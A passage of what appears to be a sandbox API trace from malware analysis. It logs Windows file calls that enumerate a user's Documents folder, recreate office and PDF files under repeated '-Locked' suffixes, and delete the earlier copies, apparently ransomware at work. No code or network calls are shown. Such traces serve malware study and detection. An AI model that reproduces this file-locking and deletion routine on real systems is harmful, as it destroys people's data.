lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x54 [0305.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.711] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eunc2mdenvic3bg6_9q.xlsx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.712] GetFileType (hFile=0x49c) returned 0x1 [0305.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.712] GetFileType (hFile=0x49c) returned 0x1 [0305.713] CloseHandle (hObject=0x49c) returned 1 [0305.714] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0305.714] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\eUnC2MDENVIC3bG6_9q.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\eunc2mdenvic3bg6_9q.xlsx-locked-locked-locked")) returned 1 [0305.715] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x54 [0305.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.715] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fqnoqaqiu_64xnnqsna.xlsx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.715] GetFileType (hFile=0x49c) returned 0x1 [0305.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.716] GetFileType (hFile=0x49c) returned 0x1 [0305.718] CloseHandle (hObject=0x49c) returned 1 [0305.718] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0305.718] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\FQNOqAqIU_64xnNqSNa.xlsx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fqnoqaqiu_64xnnqsna.xlsx-locked-locked-locked")) returned 1 [0305.719] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x54 [0305.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.719] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fukbcywvnkwtczgpojsy.ppt-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.719] GetFileType (hFile=0x49c) returned 0x1 [0305.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.720] GetFileType (hFile=0x49c) returned 0x1 [0305.721] CloseHandle (hObject=0x49c) returned 1 [0305.722] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0305.722] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\fUkbCywvnkWTcZgPOjsY.ppt-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\fukbcywvnkwtczgpojsy.ppt-locked-locked-locked")) returned 1 [0305.722] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x48 [0305.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.722] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hbfgjdyk.doc-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.723] GetFileType (hFile=0x49c) returned 0x1 [0305.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.723] GetFileType (hFile=0x49c) returned 0x1 [0305.725] CloseHandle (hObject=0x49c) returned 1 [0305.725] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked-Locked", lpFilePart=0x0) returned 0x41 [0305.725] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HBfGjDyK.doc-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hbfgjdyk.doc-locked-locked-locked")) returned 1 [0305.726] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x49 [0305.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.726] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hum 71h6w.pdf-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.727] GetFileType (hFile=0x49c) returned 0x1 [0305.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.727] GetFileType (hFile=0x49c) returned 0x1 [0305.774] CloseHandle (hObject=0x49c) returned 1 [0305.775] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x42 [0305.775] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\HUM 71h6W.pdf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\hum 71h6w.pdf-locked-locked-locked")) returned 1 [0305.777] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x53 [0305.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.777] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\joed-0tt3pwkphxst7.pptx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.778] GetFileType (hFile=0x49c) returned 0x1 [0305.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.778] GetFileType (hFile=0x49c) returned 0x1 [0305.781] CloseHandle (hObject=0x49c) returned 1 [0305.782] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4c [0305.782] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\joed-0tT3pwKPHxST7.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\joed-0tt3pwkphxst7.pptx-locked-locked-locked")) returned 1 [0305.783] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x54 [0305.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.784] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\jyyuhn3_bnmif1-mgptc.ots-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.784] GetFileType (hFile=0x49c) returned 0x1 [0305.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.784] GetFileType (hFile=0x49c) returned 0x1 [0305.787] CloseHandle (hObject=0x49c) returned 1 [0305.787] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0305.787] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\jYYuHN3_bnMiF1-mgPtc.ots-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\jyyuhn3_bnmif1-mgptc.ots-locked-locked-locked")) returned 1 [0305.788] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x52 [0305.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.789] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nym pgdb-5 ihzerct.doc-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.789] GetFileType (hFile=0x49c) returned 0x1 [0305.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.790] GetFileType (hFile=0x49c) returned 0x1 [0305.792] CloseHandle (hObject=0x49c) returned 1 [0305.792] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4b [0305.792] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\NyM PGDB-5 iHZerCT.doc-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nym pgdb-5 ihzerct.doc-locked-locked-locked")) returned 1 [0305.793] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4b [0305.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.794] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\o4aclzz-jet.doc-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.794] GetFileType (hFile=0x49c) returned 0x1 [0305.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.794] GetFileType (hFile=0x49c) returned 0x1 [0305.797] CloseHandle (hObject=0x49c) returned 1 [0305.797] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked-Locked", lpFilePart=0x0) returned 0x44 [0305.797] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\o4aClzZ-jet.doc-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\o4aclzz-jet.doc-locked-locked-locked")) returned 1 [0305.798] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x53 [0305.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.799] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pa5csh5h5ccswzcjqi.docx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.799] GetFileType (hFile=0x49c) returned 0x1 [0305.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.799] GetFileType (hFile=0x49c) returned 0x1 [0305.801] CloseHandle (hObject=0x49c) returned 1 [0305.802] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4c [0305.802] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\pA5CsH5h5CcswZCjqi.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pa5csh5h5ccswzcjqi.docx-locked-locked-locked")) returned 1 [0305.803] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x54 [0305.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.803] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\w7zbdbvsngltrwegfjh.pptx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.804] GetFileType (hFile=0x49c) returned 0x1 [0305.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.804] GetFileType (hFile=0x49c) returned 0x1 [0305.806] CloseHandle (hObject=0x49c) returned 1 [0305.806] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4d [0305.806] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\W7ZbDBvsnGLTRWeGfJh.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\w7zbdbvsngltrwegfjh.pptx-locked-locked-locked")) returned 1 [0305.807] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4c [0305.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.807] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ypczcdl_ldx.pptx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.808] GetFileType (hFile=0x49c) returned 0x1 [0305.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.808] GetFileType (hFile=0x49c) returned 0x1 [0305.867] CloseHandle (hObject=0x49c) returned 1 [0305.867] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x45 [0305.867] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yPcZCDl_ldX.pptx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ypczcdl_ldx.pptx-locked-locked-locked")) returned 1 [0305.868] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x44 [0305.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.868] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zbhj.pdf-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.869] GetFileType (hFile=0x49c) returned 0x1 [0305.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.869] GetFileType (hFile=0x49c) returned 0x1 [0305.870] CloseHandle (hObject=0x49c) returned 1 [0305.871] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked-Locked", lpFilePart=0x0) returned 0x3d [0305.871] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\zBhJ.pdf-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zbhj.pdf-locked-locked-locked")) returned 1 [0305.871] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked-Locked", lpFilePart=0x0) returned 0x51 [0305.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.871] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zfnxj8 _1nrlffhg.docx-locked-locked-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.872] GetFileType (hFile=0x49c) returned 0x1 [0305.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.872] GetFileType (hFile=0x49c) returned 0x1 [0305.873] CloseHandle (hObject=0x49c) returned 1 [0305.874] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked", lpFilePart=0x0) returned 0x4a [0305.874] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ZFnXJ8 _1nRlfFhG.docx-Locked-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zfnxj8 _1nrlffhg.docx-locked-locked-locked")) returned 1 [0305.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0305.874] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0305.874] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\", lpFilePart=0x0) returned 0x2d [0305.874] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x34b71006, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b71006, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.875] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x34b71006, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b71006, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.875] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b0bad5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b0bad5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b0bad5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BVt ejKmCvm0R4EXK.ods-Locked-Locked-Locked", cAlternateFileName="BVTEJK~2.ODS")) returned 1 [0305.875] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b4c5d8, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34b4c5d8, 